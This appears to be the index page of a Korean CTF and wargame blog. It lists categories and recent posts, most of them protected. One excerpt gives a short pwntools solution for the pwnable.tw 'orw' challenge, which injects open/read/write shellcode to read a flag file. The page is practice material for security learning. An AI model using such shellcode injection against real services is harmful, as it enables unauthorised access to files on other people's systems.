포너블은 새벽에

포너블은 새벽에

  • 분류 전체보기 (603)
    • CTF's Write-up (141)
    • Pwnable (35)
      • hackerschool (1)
    • Reversing (0)
    • Web (9)
    • Misc (2)
      • xcz.kr (2)
    • algorithm (153)
      • 기초다지기 (46)
      • dimigo.goorm.io (107)
    • etc... (34)
      • computer (1)
      • 개인공간 (8)
      • 1인1프로젝트 (2)
      • Idea Store (2)
      • Programing (2)
      • 컨퍼런스 (18)
    • WarGame (229)
      • Bandit (35)
      • webhaking.kr (39)
      • LOS (22)
      • pwnable.kr (20)
      • LOB (22)
      • Fedora Core 3&4 (5)
      • exploit-exercises.com-fusio.. (3)
      • CodeEngn (1)
      • Wargame.kr (1)
      • Rootme (48)
      • Reversing.kr (2)
      • cryptohack.org (31)
    • 스터디, 연구, 분석 (0)
  • 홈
  • FACEBOOK
  • GITHUB
  • INSTARGRAM
  • TWITTEER
  • PROFILE
RSS 피드
로그인
로그아웃 글쓰기 관리

포너블은 새벽에

컨텐츠 검색

태그

pwnable.co.kr 정보보호 pwnable webhacking 자가진단 정보올림피아드 webhacking.kr 보안 m0nday 정올 Bandit cryptohack.org Crypto HackCTF DreamHack 해킹 m0nd2y rootme hacking Linux

최근글

댓글

공지사항

  • portfolio - m0nday

아카이브

분류 전체보기(603)

  • dreamhack.io - tcache_dup2

    보호되어 있는 글입니다.

    2021.09.03
  • dreamhack.io - web-HTTP-CLI

    보호되어 있는 글입니다.

    2021.09.02
  • dreamhack.io - cpp_string

    보호되어 있는 글입니다.

    2021.09.01
  • pwnable.tw - orw

    쉘코딩 하면 덴다. from pwn import * r = remote("chall.pwnable.tw", 10001) e = ELF("orw") context.log_level = "debug" context(arch='i386', os='linux') pay = "" pay += asm(shellcraft.open('/home/orw/flag')) pay += asm(shellcraft.read('eax', e.bss()+0x100, 100)) pay += asm(shellcraft.write(1, e.bss()+0x100, 100)) r.recv() r.sendline(pay) r.interactive()

    2021.08.31
  • pwnable.kr. - fsb

    보호되어 있는 글입니다.

    2021.08.29
  • pwnable.kr - brain fuck

    보호되어 있는 글입니다.

    2021.08.27
1 2 3 4 5 6 7 ··· 101
티스토리
© 2018 TISTORY. All rights reserved.

티스토리툴바